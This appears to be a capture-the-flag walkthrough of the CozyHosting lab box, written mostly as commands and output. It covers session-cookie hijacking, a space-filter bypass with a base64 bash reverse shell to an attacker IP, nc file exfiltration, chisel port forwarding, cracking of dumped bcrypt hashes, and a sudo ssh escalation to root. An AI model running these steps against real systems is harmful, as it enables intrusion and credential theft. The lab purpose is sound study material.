Nmap

PORT   STATE SERVICE VERSION                                                                                                                                                                  
22/tcp open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.3 (Ubuntu Linux; protocol 2.0)                                                                                                             
| ssh-hostkey:                                                                                                                                                                                
|   256 4356bca7f2ec46ddc10f83304c2caaa8 (ECDSA)                                                                                                                                              
|_  256 6f7a6c3fa68de27595d47b71ac4f7e42 (ED25519)                                                                                                                                            
80/tcp open  http    nginx 1.18.0 (Ubuntu)                                                                                                                                                    
|_http-server-header: nginx/1.18.0 (Ubuntu)                                                                                                                                                   
|_http-title: Cozy Hosting - Home                                                                                                                                                             
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Enumeration for directory and files

Pasted-image-20231015122831.png

/actuator/sessions stores the cookie session

466A6E102F39705E188641FCA0D63E03    "kanderson"
A7ACC66BB7189D353EA6B026A42FC646    "UNAUTHORIZED"

Modify the cookie value to user kanderson, manage to bypass login as admin

Pastedimage20231015123621.png

The command injection is vulnerable at username, it does filter the white space. Using the payload below to generate a reverse shell without space or able to use ${IFS} alternatively

Pasted-image-20231014171548.png

root;`{echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNC4xMS8xMzM3IDA+JjEK}|{base64,-d}|bash`

Manage to get user app

After some enumeration we found ourself high possible be in a docker container.

app@cozyhosting:/app$ ls -la                                                                    
ls -la                                                                                               
total 58856                                                                                   
drwxr-xr-x  2 root root     4096 Aug 14 14:11 .                                 
drwxr-xr-x 19 root root     4096 Aug 14 14:11 ..
-rw-r--r--  1 root root 60259688 Aug 11 00:45 cloudhosting-0.0.1.jar

The docker container does not install python and do not have permission to write on /var/www, however nc is installed.

Sending

nc -l -p 1234 > out.file

Receiving

nc -w 3 [destination] 1234 < out.file

after some review, found some creds for psql

spring.datasource.username=postgres
spring.datasource.password=Vg&nvzAQ7XxR

double check if psql port 5432 is enabled in the box

app@cozyhosting:/home$ ss -lutn
ss -lutn
Netid State  Recv-Q Send-Q      Local Address:Port Peer Address:PortProcess
udp   UNCONN 0      0           127.0.0.53%lo:53        0.0.0.0:*          
udp   UNCONN 0      0                 0.0.0.0:68        0.0.0.0:*          
tcp   LISTEN 0      244             127.0.0.1:5432      0.0.0.0:*          
tcp   LISTEN 0      511               0.0.0.0:80        0.0.0.0:*          
tcp   LISTEN 0      4096        127.0.0.53%lo:53        0.0.0.0:*          
tcp   LISTEN 0      128               0.0.0.0:22        0.0.0.0:*          
tcp   LISTEN 0      100    [::ffff:127.0.0.1]:8080            *:*          
tcp   LISTEN 0      128                  [::]:22           [::]:*

However it’s listening to localhost only.

reverse port forwarding is needed.

Attacker chisel reverse server

Listening on port 51234

./chisel server --reverse --port 51234

Victim chisel Client

Connect to attacker port 51234 and create a port forwarding 5432

./chisel client 10.10.14.11:51234 R:5432:127.0.0.1:5432

Psql

Connect to localhost

psql -h 127.0.0.1 -p 5432 -U postgres

In cozyhosting database, found the some creds.

cozyhosting=# select * from users;                             
   name    |                           password                           | role                                               
-----------+--------------------------------------------------------------+-------                                             
 kanderson | $2a$10$E/Vcd9ecflmPudWeLSEIv.cvK6QjxjWlWXpij1NVNV3Mm6eH58zim | User                                               
 admin     | $2a$10$SpKYdHLB0FOaT7n3x72wtuS0yR8uqqbNNpIPjUb2MZib3H9kVO8dm | Admin

Use hashcat to bruteforce the bcrypt

hashcat.exe -m 3200 -a 0 .\hash\cozyhosting.txt rockyou.txt --username

and got the password as manchesterunited

D:\hashcat-6.2.6>hashcat.exe -m 3200 -a 0 .\hash\cozyhosting.txt rockyou.txt --username --show
admin:$2a$10$SpKYdHLB0FOaT7n3x72wtuS0yR8uqqbNNpIPjUb2MZib3H9kVO8dm:manchesterunited

Login as Josh

Tried different combination of username, found we are to login the user found in the docker josh:manchesterunited

Root

Matching Defaults entries for josh on localhost:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty

User josh may run the following commands on localhost:
    (root) /usr/bin/ssh *

checkout for GTFOBINS we got ourself root easily.

Pasted-image-20231015125414.png

root:$y$j9T$nK3A0N4wTEzopZkv8GQds0$NlR46AiiQOChoO1UNpiOYFIBHM7s956G8l8p/w15Sp2:19577:0:99999:7:::

root